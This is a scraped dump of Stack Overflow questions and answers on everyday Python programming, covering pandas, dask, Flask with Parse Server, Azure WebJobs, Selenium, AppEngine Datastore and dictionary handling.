dd.DataFrame<dataframe-groupby-get_group-022502413b236592cf7d54b2dccf10a9, divisions=(0, 2, 4, 4)>
</code></pre>
| 1 | 2016-09-27T19:26:31Z | [
"python",
"pandas",
"dask"
]
|
iterate over GroupBy object in dask | 39,731,098 | <p>Is it possible, to iterate over a dask GroupBy object to get access to the underlying dataframes? I tried:</p>
<pre><code>import dask.dataframe as dd
import pandas as pd
pdf = pd.DataFrame({'A':[1,2,3,4,5], 'B':['1','1','a','a','a']})
ddf = dd.from_pandas(pdf, npartitions = 3)
groups = ddf.groupby('B')
for name, df in groups:
print(name)
</code></pre>
<p>However, this results in an error: <code>KeyError: 'Column not found: 0'</code></p>
<p>More generally speaking, what kind of interactions does the dask GroupBy object allow, except from the apply method?</p>
| 1 | 2016-09-27T17:40:48Z | 39,831,940 | <p>Generally iterating over Dask.dataframe objects is not recommended. It is inefficient. Instead you might want to try constructing a function and mapping that function over the resulting groups using <code>groupby.apply</code></p>
| 0 | 2016-10-03T12:41:55Z | [
"python",
"pandas",
"dask"
]
|
Matching entities with Google AppEngine MapReduce | 39,731,109 | <p>I have the following problem: I am using Google Datastore to store two kinds, <strong>Companies</strong> and <strong>Applicants</strong>, both of them come from different data sources so there is no way to link them directly (no common ID).</p>
<p>What I am trying to achieve is to compare the <strong>name</strong> of the entities of these two kinds (after doing some normalization) and save these as a new entity of type <strong>Match</strong>.</p>
<p>For that I created a MapReduce job on appengine that go through all the applicants (~ 1M entities) and for each entity queries for Companies with the same name (~ 10M entities in total), but the process is painfully slow, I am getting the following throughput:</p>
<p>mapper-calls: 691411 (9.27/sec avg.)<br/>
mapper-walltime-ms: 1724026200 (23108.41/sec avg.)</p>
<p>The wall time seems for me a bit too high but I am not sure of what it means, I am running 32 shards and the code is the following:</p>
<pre><code>def match_map(applicant):
if(applicant.applicant_name_normalised != ""):
# Check against the companies
cps = Company.query(Company.name_normalised == applicant.applicant_name_normalised).fetch(projection=[Company.dissolved])
if(len(cps) > 0):
is_potential = True
else:
return
m = Match(id=applicant.key.id())
idList = []
for c in cps:
idList.append(c.key)
if(c.dissolved != True):
is_potential = False
m.companies = idList
m.applicant = applicant.key
m.is_potential = is_potential
if(is_potential):
yield op.db.Put(m)
idList[:] = []
</code></pre>
<p>How could I implement this so it runs faster? I am almost to the point of leaving google datastore and doing this on another database or using scripts, I know queries can be expensive but 10 entities/s is just way lower than what I was expecting.</p>
<p>Thanks</p>
| 0 | 2016-09-27T17:41:23Z | 39,735,436 | <p>I can think of minor tips that could optimize what you do such as:</p>
<p>Instead of fetching all the results, iterate and bail fast if c.dissolved != True (e.g. starts with is_potential = True, set it to True in iterator or return if c.dissolved != True)</p>
<p>However, understanding the data model and what you are trying to achieve may help to come up with a more optimal solution. In general Cloud Datastore is not
designed for cross Kinds joins and maybe Google Cloud SQL would better fit this problem.</p>
<p>Also, data growth expectation would help. As of now loading (10 + 1) millions record (or projected data to save space) into memory and doing an in-memory join
would be simple and feasible but clearly does not scale.</p>
<p>Regarding scale, your current approach may also have an issue if the number of company keys per match would be to large to fit in one entity.</p>
| 0 | 2016-09-27T22:41:35Z | [
"python",
"google-app-engine",
"mapreduce",
"google-cloud-datastore"
]
|
What does {:4} mean in this matrix printing solution in python? | 39,731,205 | <p>In the solution to the question proposed here <a href="http://stackoverflow.com/questions/17870612/printing-a-two-dimensional-array-in-python">printing a two dimensional array in python</a> I'm not able to figure out what the {:4} part of the solution means exactly. I've tried this print statement and it seems to work very well, but for cases where I have very large matrices, I want to make sure I'm not adding or slicing valuable information.</p>
| 0 | 2016-09-27T17:48:00Z | 39,731,279 | <p>It has to do with padding and alignment in output. It is similar to padding in the <code>printf</code> function found in <code>c</code> or <code>awk</code>, etc. It gives each printed element a width of <code>n</code> where <code>n</code> is <code>{:n}</code>.</p>
<pre><code>''.join('{:3}'.format(x) for x in range(100))
</code></pre>
<p>Will output:</p>
<pre><code>' 0 1 2 3 4 5 ... 95 96 97 98 99'
</code></pre>
<p>Notice the single space to the left of <code>99</code> versus the two spaces to the left of <code>0</code>. In other words, each number has a width of 3 characters.</p>
<p>You can also accomplish a similar effect using a more traditional syntax.</p>
<pre><code>''.join('%3s' % x for x in range(100))
</code></pre>
| 2 | 2016-09-27T17:52:41Z | [
"python",
"arrays",
"matrix",
"printing",
"slice"
]
|
How to build python matrix (multidimensional array) based on number of rows and colums received from input | 39,731,262 | <p>Given rectangular array (matrix) MxN with integer elements. M & N are the number of rows and columns of the rectangular matrix, received from input in one line separated by speces. Next, N lines with M numbers each, separated by a space â the elements of the matrix, integers, not exceeding 100 by absolute value.</p>
<p>For example:</p>
<p>Sample Input:</p>
<pre><code>2 3
1 -2 3
4 5 6
</code></pre>
<p>Sample Output:</p>
<pre><code>[[1, -2, 3], [4, 5, 6]]
</code></pre>
<p>Code:</p>
<pre><code>cols, rows = [int(i) for i in input().split(" ")]
l = [[list(map(int, input()))] for j in range(rows)]
</code></pre>
<p>With rows its clear, however, I dont know how to control line length, so it be equal to the number, receved from input as cols </p>
<p>Any hints will be appreciated...</p>
| 0 | 2016-09-27T17:51:33Z | 39,731,523 | <p>First of all based on sample output, I saw that rows and cols should be interchanged and second use split by cols [:cols] as shown in the code below</p>
<pre><code>rows, cols = [int(i) for i in input().split(" ")]
l = [map(int, input().split(" ")[:cols]) for i in range(rows)]
</code></pre>
| 0 | 2016-09-27T18:06:54Z | [
"python",
"arrays",
"python-3.x",
"matrix",
"input"
]
|
Manipulating pandas series - empty rows in a column | 39,731,313 | <p>I apologize in advance for what I guess is a basic dataframe / series selection issue, but I am a newbie and a bit stuck.</p>
<p>I have the following data:</p>
<pre><code>seas off
2000 ARI 0.569369
ATL 0.553398
BAL 0.554404
BUF 0.571429
CAR 0.600000
CHI 0.560886
CIN 0.454945
CLE 0.573196
DAL 0.572707
DEN 0.612850
DET 0.550696
</code></pre>
<p>The 'seas' then repeats for 2001 and so on for 2015. FWIW, when I try <code>df['off']</code> it doesn't return the "off" column.</p>
<p>Anyway, what I want to do is basically create a key for each number. To do this I want to copy the year down for each row so it and then to add it to "off" to get a key. So as follows:</p>
<pre><code>seas off value key
2000 ARI 0.569369 2000ARI
2000 ATL 0.553398 2000ATL
2000 BAL 0.554404 2000BAL
2000 BUF 0.571429 2000BUF
2000 CAR 0.600000 2000CAR
...
...
2001 CHI 0.560886 2001CHI
2001 CIN 0.454945 2001CIN
2001 CLE 0.573196 2001CLE
2001 DAL 0.572707 2001DAL
2001 DEN 0.612850 2001DEN
2001 DET 0.550696 2001DET
</code></pre>
<p>Help much appreciated ...</p>
<p>John</p>
| -1 | 2016-09-27T17:55:00Z | 39,731,502 | <p>My guess is that you don't have a DataFrame, but a Series with a MultiIndex.</p>
<pre><code>import io
import pandas as pd
data = io.StringIO('''\
seas off value
2000 ARI 0.569369
2000 ATL 0.553398
2000 BAL 0.554404
2000 BUF 0.571429
2000 CAR 0.600000
2000 CHI 0.560886
2000 CIN 0.454945
2000 CLE 0.573196
2000 DAL 0.572707
2000 DEN 0.612850
2000 DET 0.550696
''')
df = pd.read_csv(data, delim_whitespace=True).set_index(['seas', 'off']).squeeze()
</code></pre>
<p>In that case, here's what you can do. First, make <code>seas</code> and <code>off</code> into columns of a DataFrame:</p>
<pre><code>df = df.reset_index()
</code></pre>
<p>Then create a column <code>key</code> by concatenating the <code>seas</code> and <code>off</code> columns:</p>
<pre><code>df['key'] = df['seas'].astype(str) + df['off']
</code></pre>
<p>Finally, send <code>seas</code> and <code>off</code> back to the index:</p>
<pre><code>df = df.set_index(['seas', 'off'])
</code></pre>
<p>Output:</p>
<pre><code> value key
seas off
2000 ARI 0.569369 2000ARI
ATL 0.553398 2000ATL
BAL 0.554404 2000BAL
BUF 0.571429 2000BUF
CAR 0.600000 2000CAR
CHI 0.560886 2000CHI
CIN 0.454945 2000CIN
CLE 0.573196 2000CLE
DAL 0.572707 2000DAL
DEN 0.612850 2000DEN
DET 0.550696 2000DET
</code></pre>
| 1 | 2016-09-27T18:05:49Z | [
"python",
"pandas",
"dataframe",
"series"
]
|
Authentication Error when using Flask to connect to ParseServer | 39,731,315 | <p>What I am trying to achieve is pretty simple.</p>
<p>I want to use Flask to create a web app that connects to a remote Server via API calls (specifically ParseServer).
I am using a third-party library to achieve this and everything works perfectly when I am running my code in a stand-alone script. But when I add my code into the Flask I suddenly can't authenticate with the Server</p>
<blockquote>
<p>Or to be more precise I get an 'unauthorized' error when executing an API call. </p>
</blockquote>
<p>It seems to me that in Flask, the registration method used by the APi library is not remembered.</p>
<p>I tried many things of putting the registration and initialization code in different places in Flask, nothing worked. </p>
<p>I asked a similar question in the Github of the <a href="https://github.com/milesrichardson/ParsePy/issues/147" rel="nofollow">Library</a> with no help. </p>
<p>So I guess I have <strong>two questions</strong> that could help me solve this</p>
<p>1) Where should I put a registration method and import of the files from this library?
&</p>
<p>2) What can I do to identify the issue specifically, eg. to know precisely what's wrong?</p>
<p>Here's some code</p>
<p>The Flask code is here</p>
<pre><code>@app.route('/parseinsert')
def run_parse_db_insert():
"""The method for testing implementation and design of the Parse Db
"""
pc = ParseCommunication()
print(pc.get_all_names_rating_table())
return 'done'
</code></pre>
<p>The ParseCommunication is my Class that deals with Parse. If I run ParseCommunication from that script, with the same code as above in the <strong>main</strong> part, everything works perfectly.</p>
<p>I run the Flask app with dev_appserver.py from Google App Engine.</p>
<p>My folder structure </p>
<pre><code>/parseTest
/aplication
views.py
app.yaml
run.py
</code></pre>
<p>My run.py code</p>
<pre><code>import os
import sys
sys.path.insert(1, os.path.join(os.path.abspath('.'), 'lib'))
sys.path.insert(1, os.path.join(os.path.abspath('.'), 'application'))
import aplication
</code></pre>
<p>Let me know what else I could provide to help out.</p>
<p>Thank you in Advance</p>
<p>EDIT:</p>
<p>A stack trace as requested.
It's mostly related to the library (from what I can say?)</p>
<pre><code>ERROR 2016-09-28 06:45:50,271 app.py:1587] Exception on /parseinsert [GET]
Traceback (most recent call last):
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1988, in wsgi_app
response = self.full_dispatch_request()
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1641, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1544, in handle_user_exception
reraise(exc_type, exc_value, tb)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1639, in full_dispatch_request
rv = self.dispatch_request()
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/flask/app.py", line 1625, in dispatch_request
return self.view_functions[rule.endpoint](**req.view_args)
File "/home/theshade/Devel/ParseBabynames/parseTest/aplication/views.py", line 34, in run_parse_db_insert
name = pc.get_user('testuser1')
File "/home/theshade/Devel/ParseBabynames/parseTest/aplication/parseCommunication.py", line 260, in get_user
return User.Query.get(username=uname)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/query.py", line 58, in get
return self.filter(**kw).get()
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/query.py", line 150, in get
results = self._fetch()
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/query.py", line 117, in _fetch
return self._manager._fetch(**options)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/query.py", line 41, in _fetch
return [klass(**it) for it in klass.GET(uri, **kw).get('results')]
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/connection.py", line 108, in GET
return cls.execute(uri, 'GET', **kw)
File "/home/theshade/Devel/ParseBabynames/parseTest/lib/parse_rest/connection.py", line 102, in execute
raise exc(e.read())
ResourceRequestLoginRequired: {"error":"unauthorized"}
</code></pre>
| 0 | 2016-09-27T17:55:03Z | 39,751,964 | <p>Parse requires keys and env variables. Check this line:</p>
<p><code>API_ROOT = os.environ.get('PARSE_API_ROOT') or 'https://api.parse.com/1'</code></p>
<p>Your error is in line 102 at:</p>
<p><code>https://github.com/milesrichardson/ParsePy/blob/master/parse_rest/connection.py</code></p>
<p>Before you can parse, you need to register:</p>
<pre><code>from parse_rest.connection import register
APPLICATION_ID = '...'
REST_API_KEY = '...'
MASTER_KEY = '...'
register(APPLICATION_ID, REST_API_KEY, master_key=MASTER_KEY)
</code></pre>
| 1 | 2016-09-28T15:36:15Z | [
"python",
"google-app-engine",
"parse.com",
"flask",
"parse-server"
]
|
Selenium python- how can I fill all input fields at once | 39,731,338 | <p>Is it possible to fill all the fields on the page at once instead of one by one?</p>
<p>Right now I have</p>
<pre><code>driver.find_element_by_id('1').send_keys(input1)
driver.find_element_by_id('2').send_keys(input2)
driver.find_element_by_id('3').send_keys(input3)
</code></pre>
<p>and it goes one by one taking a while to fill a form.</p>
| 0 | 2016-09-27T17:56:56Z | 39,731,393 | <p>You may construct a <code>dict</code> in python to store the values corresponding to id and Iterate over it to fill up the corresponding data.</p>
<pre><code>input_mapping = {"1": "input1", "2": "input2", "3": "input3"}
for key, value in input_mapping.items():
driver.find_element_by_id(key).send_keys(value)
</code></pre>
<p>But the above approach won't be sequential. as the dictionary maintains no order on it's own. So it would be a better choice to use <code>collections.OrderedDict()</code> if the order really matters</p>
| 0 | 2016-09-27T17:59:36Z | [
"python",
"selenium",
"webdriver"
]
|
Can't access blob storage via azure-storage package in Python WebJob | 39,731,370 | <p>I am trying to read/write from blob storage using a Python WebJob on an Azure App Service. My App Service's requirements.txt file includes the azure-storage package name: the package is successfully installed via pip during App Service deployment. However, when I include the following in my WebJob's run.py file:</p>
<pre><code>import sys
sys.path.append('D:\\home\\site\\wwwroot\\env\\Lib\\site-packages')
from azure.storage.blob import BlockBlobService
</code></pre>
<p>...I get the following error message at runtime:</p>
<pre><code>[09/27/2016 17:51:09 > 775106: SYS INFO] Status changed to Initializing
[09/27/2016 17:51:09 > 775106: SYS INFO] Run script 'run.py' with script host - 'PythonScriptHost'
[09/27/2016 17:51:09 > 775106: SYS INFO] Status changed to Running
[09/27/2016 17:51:10 > 775106: ERR ] Traceback (most recent call last):
[09/27/2016 17:51:10 > 775106: ERR ] File "run.py", line 11, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from azure.storage.blob import BlockBlobService
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\blob\__init__.py", line 15, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from .models import (
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\blob\models.py", line 15, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from .._common_conversion import _to_str
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\_common_conversion.py", line 22, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from .models import (
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\models.py", line 23, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from ._error import (
[09/27/2016 17:51:10 > 775106: ERR ] File "D:\home\site\wwwroot\env\Lib\site-packages\azure\storage\_error.py", line 15, in <module>
[09/27/2016 17:51:10 > 775106: ERR ] from ._common_conversion import _to_str
[09/27/2016 17:51:10 > 775106: ERR ] ImportError: cannot import name '_to_str'
[09/27/2016 17:51:10 > 775106: SYS INFO] Status changed to Failed
[09/27/2016 17:51:10 > 775106: SYS ERR ] Job failed due to exit code 1
</code></pre>
<p>FWIW, several other packages were loaded properly using the same approach. Can anyone suggest a method to get the azure-storage package working in Python Azure WebJobs?</p>
| 0 | 2016-09-27T17:58:36Z | 39,779,590 | <p>Looks like six module is missing. This issue is also tracked via this thread: <a href="https://github.com/Azure/azure-storage-python/issues/22" rel="nofollow">https://github.com/Azure/azure-storage-python/issues/22</a>. You can fix issue by adding the six module to requirements.txt or manually installing six module by pip install six. </p>
| 1 | 2016-09-29T20:39:49Z | [
"python",
"azure",
"windows-azure-storage",
"azure-storage-blobs",
"azure-webjobs"
]
|
dataframe column slices excluding specific columns | 39,731,395 | <p>How will i slice pandas dataframe with large number of columns, where I do not wish to select specific and non-sequentially positioned columns? One option is to drop the specific columns, but can i do something like:</p>
<pre><code>df = pd.DataFrame(np.random.randint(0,100,(2,10)),columns=list('abcdefghij'))
df.iloc[:,~[1,4,9]]
</code></pre>
| 1 | 2016-09-27T17:59:46Z | 39,731,653 | <p>you can do it this way:</p>
<pre><code>In [66]: cols2exclude = [1,4,9]
In [67]: df.ix[:, df.columns.difference(df.columns[cols2exclude])]
Out[67]:
a c d f g h i
0 12 37 39 46 22 71 37
1 72 3 17 30 11 26 73
</code></pre>
<p>or:</p>
<pre><code>In [68]: df.ix[:, ~df.columns.isin(df.columns[cols2exclude])]
Out[68]:
a c d f g h i
0 68 49 90 9 48 36 26
1 6 72 98 49 44 10 36
</code></pre>
| 1 | 2016-09-27T18:15:46Z | [
"python",
"pandas",
"dataframe",
"slice"
]
|
python pandas summarizing nominal variables (counting) | 39,731,396 | <p>I have following data frame:</p>
<pre class="lang-none prettyprint-override"><code>KEY PROD PARAMETER Y/N
1 AAA PARAM1 Y
1 AAA PARAM2 N
1 AAA PARAM3 N
2 AAA PARAM1 N
2 AAA PARAM2 Y
2 AAA PARAM3 Y
3 CCC PARAM1 Y
3 CCC PARAM2 Y
3 CCC PARAM3 Y
</code></pre>
<p>I am interested in summarizing Y/N column values by PROD and PARAMETER columns and get the following output:</p>
<pre class="lang-none prettyprint-override"><code>PROD PARAM Y N
AAA PARAM1 1 1
AAA PARAM2 1 1
AAA PARAM3 1 1
CCC PARAM1 1 0
CCC PARAM2 1 0
CCC PARAM3 1 0
</code></pre>
<p>While Y and N values are counts of Y/N column values from the original data frame.</p>
| 2 | 2016-09-27T17:59:57Z | 39,731,740 | <p>You could use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.pivot_table.html" rel="nofollow"><code>pivot_table</code></a> by creating an additional column with the value 1 as it doesn't matter either ways (You are only counting them)</p>
<pre><code>df['Y/Ncount'] = 1
df = df.pivot_table(index=['PROD', 'PARAMETER'], columns=['Y/N'], values=['Y/Ncount'],
aggfunc=sum, fill_value=0)
df.columns = [col for col in df.columns.get_level_values(1)]
df.reset_index()
</code></pre>
<p><a href="http://i.stack.imgur.com/OvPpj.png" rel="nofollow"><img src="http://i.stack.imgur.com/OvPpj.png" alt="Image"></a></p>
<hr>
<p>The simplest operation to use under this scenario would be <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.crosstab.html" rel="nofollow"><code>crosstab</code></a> which would produce the frequency counts of values present inside the Y/N column:</p>
<pre><code>pd.crosstab([df['PROD'], df['PARAMETER']], df['Y/N'])
</code></pre>
<p><a href="http://i.stack.imgur.com/1p6eA.png" rel="nofollow"><img src="http://i.stack.imgur.com/1p6eA.png" alt="Image"></a></p>
| 3 | 2016-09-27T18:20:50Z | [
"python",
"pandas",
"dataframe",
"summarize"
]
|
python pandas summarizing nominal variables (counting) | 39,731,396 | <p>I have following data frame:</p>
<pre class="lang-none prettyprint-override"><code>KEY PROD PARAMETER Y/N
1 AAA PARAM1 Y
1 AAA PARAM2 N
1 AAA PARAM3 N
2 AAA PARAM1 N
2 AAA PARAM2 Y
2 AAA PARAM3 Y
3 CCC PARAM1 Y
3 CCC PARAM2 Y
3 CCC PARAM3 Y
</code></pre>
<p>I am interested in summarizing Y/N column values by PROD and PARAMETER columns and get the following output:</p>
<pre class="lang-none prettyprint-override"><code>PROD PARAM Y N
AAA PARAM1 1 1
AAA PARAM2 1 1
AAA PARAM3 1 1
CCC PARAM1 1 0
CCC PARAM2 1 0
CCC PARAM3 1 0
</code></pre>
<p>While Y and N values are counts of Y/N column values from the original data frame.</p>
| 2 | 2016-09-27T17:59:57Z | 39,731,750 | <p>You want to get the counts of the values in the <code>Y/N</code> column, grouped by <code>PROD</code> and <code>PARAMETER</code>.</p>
<pre><code>import io
import pandas as pd
data = io.StringIO('''\
KEY PROD PARAMETER Y/N
1 AAA PARAM1 Y
1 AAA PARAM2 N
1 AAA PARAM3 N
2 AAA PARAM1 N
2 AAA PARAM2 Y
2 AAA PARAM3 Y
3 CCC PARAM1 Y
3 CCC PARAM2 Y
3 CCC PARAM3 Y
''')
df = pd.read_csv(data, delim_whitespace=True)
res = (df.groupby(['PROD', 'PARAMETER'])['Y/N'] # Group by `PROD` and `PARAMETER`
# and select the `Y/N` column
.value_counts() # Get the count of values
.unstack('Y/N') # Long-to-wide format change
.fillna(0) # Fill `NaN`s with zero
.astype(int)) # Cast to integer
print(res)
</code></pre>
<p>Output:</p>
<pre class="lang-none prettyprint-override"><code>Y/N N Y
PROD PARAMETER
AAA PARAM1 1 1
PARAM2 1 1
PARAM3 1 1
CCC PARAM1 0 1
PARAM2 0 1
PARAM3 0 1
</code></pre>
| 2 | 2016-09-27T18:21:30Z | [
"python",
"pandas",
"dataframe",
"summarize"
]
|
Python reading data from input file | 39,731,431 | <p>I want to read specific data from an input file. How can I read it?</p>
<p>For example my file has data like:</p>
<pre class="lang-none prettyprint-override"><code>this is my first line
this is my second line.
</code></pre>
<p>So I just want to read <code>first</code> from the first line and <code>secon</code> from the second line.</p>
| -6 | 2016-09-27T18:01:48Z | 39,732,061 | <p>Try the following code for your needs but please read the comments above.</p>
<pre><code># ----------------------------------------
# open text file and write reduced lines
# ----------------------------------------
#this is my first line
#this is my second line.
pathnameIn = "D:/_working"
filenameIn = "foobar.txt"
pathIn = pathnameIn + "/" + filenameIn
pathnameOut = "D:/_working"
filenameOut = "foobar_reduced.txt"
pathOut = pathnameOut + "/" + filenameOut
fileIn = open(pathIn,'r')
fileOut = open(pathOut,'w')
print(fileIn)
print(fileOut)
i = 0
# Save all reduced lines to a file.
for lineIn in fileIn.readlines():
i += 1 # number of lines read
lineOut = lineIn[11:16]
fileOut.writelines(lineOut +"\n")
print("*********************************")
print("gelesene Zeilen: " + str(i))
print("*********************************")
fileIn.close()
fileOut.close()
</code></pre>
| 0 | 2016-09-27T18:39:35Z | [
"python",
"python-3.x"
]
|
Math operations on multi-dimensional Python dicts | 39,731,477 | <p>I am porting over some code from PHP that iterates through some database results and builds a two-dimensional array of wins and losses for teams in a baseball league. Here's the code in question in PHP</p>
<pre><code> foreach ($results as $result) {
$home_team = $result['Game']['home_team_id'];
$away_team = $result['Game']['away_team_id'];
if (!isset($wins[$home_team][$away_team])) $wins[$home_team][$away_team] = 0;
if (!isset($wins[$away_team][$home_team])) $wins[$away_team][$home_team] = 0;
if (!isset($losses[$home_team][$away_team])) $losses[$home_team][$away_team] = 0;
if (!isset($losses[$away_team][$home_team])) $losses[$away_team][$home_team] = 0;
if ($result['Game']['home_score'] > $result['Game']['away_score']) {
$wins[$home_team][$away_team]++;
$losses[$away_team][$home_team]++;
} else {
$wins[$away_team][$home_team]++;
$losses[$home_team][$away_team]++;
}
}
</code></pre>
<p><code>$results</code> is an array that contains the results of a database query</p>
<p>(Edited to add the Python code I have in-profess)</p>
<p>Now I have this but in Python. <code>results</code> contains a collection of Sqlalchemy result objects</p>
<pre><code>from sqlalchemy import Column, create_engine, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
engine = create_engine('postgresql://stats:st@ts=Fun@localhost/ibl_stats')
Session = sessionmaker()
Session.configure(bind=engine)
session = Session()
class Game(Base):
__tablename__ = 'games'
id = Column(Integer, primary_key=True)
week = Column(Integer)
home_score = Column(Integer)
away_score = Column(Integer)
home_team_id = Column(Integer, ForeignKey('franchises.id'))
away_team_id = Column(Integer, ForeignKey('franchises.id'))
class Franchise(Base):
__tablename__ = 'franchises'
id = Column(Integer, primary_key=True)
nickname = Column(String(3))
name = Column(String(50))
conference = Column(String(10))
division = Column(String(10))
ip = Column(Integer)
# Loop through our standings building up the breakdown results
results = session.query(Game).all()
wins = dict()
losses = dict()
for result in results:
home_team = result.home_team_id
away_team = result.away_team_id
if result.home_score > result.away_score:
wins[home_team][away_team] += 1
losses[away_team][home_team] += 1
else:
wins[away_team][home_team] += 1
losses[home_team][away_team] += 1
</code></pre>
<p>So when I run this code I get the following error:</p>
<pre><code>(venv)vagrant@ibl:/vagrant/scripts$ python playoff_odds.py
Traceback (most recent call last):
File "playoff_odds.py", line 45, in <module>
wins[home_team][away_team] += 1
KeyError: 1
</code></pre>
<p>I did some searching before and it starts getting into the concept of "autovivification", which is something PHP does by default but Python does not.</p>
<p>So how do I duplicate the same behaviour in the Python code?</p>
| 2 | 2016-09-27T18:04:27Z | 39,731,664 | <p>I think I would probably use namedtuples here, but it's hard to tell from just this snippet.</p>
<p>If you'd like material on how to write more Pythonic code, I recommend checking out Raymond Hettinger's videos, particularly</p>
<p>"Best practices for beautiful intelligible code" and
"Transforming Code into Beautiful, Idiomatic Python": </p>
<p><a href="http://pyvideo.org/speaker/raymond-hettinger.html" rel="nofollow">http://pyvideo.org/speaker/raymond-hettinger.html</a></p>
| 1 | 2016-09-27T18:16:05Z | [
"python",
"dictionary"
]
|
Math operations on multi-dimensional Python dicts | 39,731,477 | <p>I am porting over some code from PHP that iterates through some database results and builds a two-dimensional array of wins and losses for teams in a baseball league. Here's the code in question in PHP</p>
<pre><code> foreach ($results as $result) {
$home_team = $result['Game']['home_team_id'];
$away_team = $result['Game']['away_team_id'];
if (!isset($wins[$home_team][$away_team])) $wins[$home_team][$away_team] = 0;
if (!isset($wins[$away_team][$home_team])) $wins[$away_team][$home_team] = 0;
if (!isset($losses[$home_team][$away_team])) $losses[$home_team][$away_team] = 0;
if (!isset($losses[$away_team][$home_team])) $losses[$away_team][$home_team] = 0;
if ($result['Game']['home_score'] > $result['Game']['away_score']) {
$wins[$home_team][$away_team]++;
$losses[$away_team][$home_team]++;
} else {
$wins[$away_team][$home_team]++;
$losses[$home_team][$away_team]++;
}
}
</code></pre>
<p><code>$results</code> is an array that contains the results of a database query</p>
<p>(Edited to add the Python code I have in-profess)</p>
<p>Now I have this but in Python. <code>results</code> contains a collection of Sqlalchemy result objects</p>
<pre><code>from sqlalchemy import Column, create_engine, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
engine = create_engine('postgresql://stats:st@ts=Fun@localhost/ibl_stats')
Session = sessionmaker()
Session.configure(bind=engine)
session = Session()
class Game(Base):
__tablename__ = 'games'
id = Column(Integer, primary_key=True)
week = Column(Integer)
home_score = Column(Integer)
away_score = Column(Integer)
home_team_id = Column(Integer, ForeignKey('franchises.id'))
away_team_id = Column(Integer, ForeignKey('franchises.id'))
class Franchise(Base):
__tablename__ = 'franchises'
id = Column(Integer, primary_key=True)
nickname = Column(String(3))
name = Column(String(50))
conference = Column(String(10))
division = Column(String(10))
ip = Column(Integer)
# Loop through our standings building up the breakdown results
results = session.query(Game).all()
wins = dict()
losses = dict()
for result in results:
home_team = result.home_team_id
away_team = result.away_team_id
if result.home_score > result.away_score:
wins[home_team][away_team] += 1
losses[away_team][home_team] += 1
else:
wins[away_team][home_team] += 1
losses[home_team][away_team] += 1
</code></pre>
<p>So when I run this code I get the following error:</p>
<pre><code>(venv)vagrant@ibl:/vagrant/scripts$ python playoff_odds.py
Traceback (most recent call last):
File "playoff_odds.py", line 45, in <module>
wins[home_team][away_team] += 1
KeyError: 1
</code></pre>
<p>I did some searching before and it starts getting into the concept of "autovivification", which is something PHP does by default but Python does not.</p>
<p>So how do I duplicate the same behaviour in the Python code?</p>
| 2 | 2016-09-27T18:04:27Z | 39,731,744 | <p>This question has many interpretations. For example I would simulate results with the following dictionary:</p>
<pre><code>>>> result = {'Game':{'home_team':{'score':20,'id':1}, 'away_team':{'score':15,'id':2}}}
>>> print result['Game']
{'home_team': {'score': 20, 'id': 1}, 'away_team': {'score': 15, 'id': 2}}
>>> print result['Game']['home_team']
{'score': 20, 'id': 1}
>>> print result['Game']['away_team']['score']
15
</code></pre>
<p>There are a lot of ways to simulate your code, the above is just one of them. Of course the code doesn't do what the php code does, just shows a way to access the data.</p>
| 1 | 2016-09-27T18:21:09Z | [
"python",
"dictionary"
]
|
Math operations on multi-dimensional Python dicts | 39,731,477 | <p>I am porting over some code from PHP that iterates through some database results and builds a two-dimensional array of wins and losses for teams in a baseball league. Here's the code in question in PHP</p>
<pre><code> foreach ($results as $result) {
$home_team = $result['Game']['home_team_id'];
$away_team = $result['Game']['away_team_id'];
if (!isset($wins[$home_team][$away_team])) $wins[$home_team][$away_team] = 0;
if (!isset($wins[$away_team][$home_team])) $wins[$away_team][$home_team] = 0;
if (!isset($losses[$home_team][$away_team])) $losses[$home_team][$away_team] = 0;
if (!isset($losses[$away_team][$home_team])) $losses[$away_team][$home_team] = 0;
if ($result['Game']['home_score'] > $result['Game']['away_score']) {
$wins[$home_team][$away_team]++;
$losses[$away_team][$home_team]++;
} else {
$wins[$away_team][$home_team]++;
$losses[$home_team][$away_team]++;
}
}
</code></pre>
<p><code>$results</code> is an array that contains the results of a database query</p>
<p>(Edited to add the Python code I have in-profess)</p>
<p>Now I have this but in Python. <code>results</code> contains a collection of Sqlalchemy result objects</p>
<pre><code>from sqlalchemy import Column, create_engine, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
engine = create_engine('postgresql://stats:st@ts=Fun@localhost/ibl_stats')
Session = sessionmaker()
Session.configure(bind=engine)
session = Session()
class Game(Base):
__tablename__ = 'games'
id = Column(Integer, primary_key=True)
week = Column(Integer)
home_score = Column(Integer)
away_score = Column(Integer)
home_team_id = Column(Integer, ForeignKey('franchises.id'))
away_team_id = Column(Integer, ForeignKey('franchises.id'))
class Franchise(Base):
__tablename__ = 'franchises'
id = Column(Integer, primary_key=True)
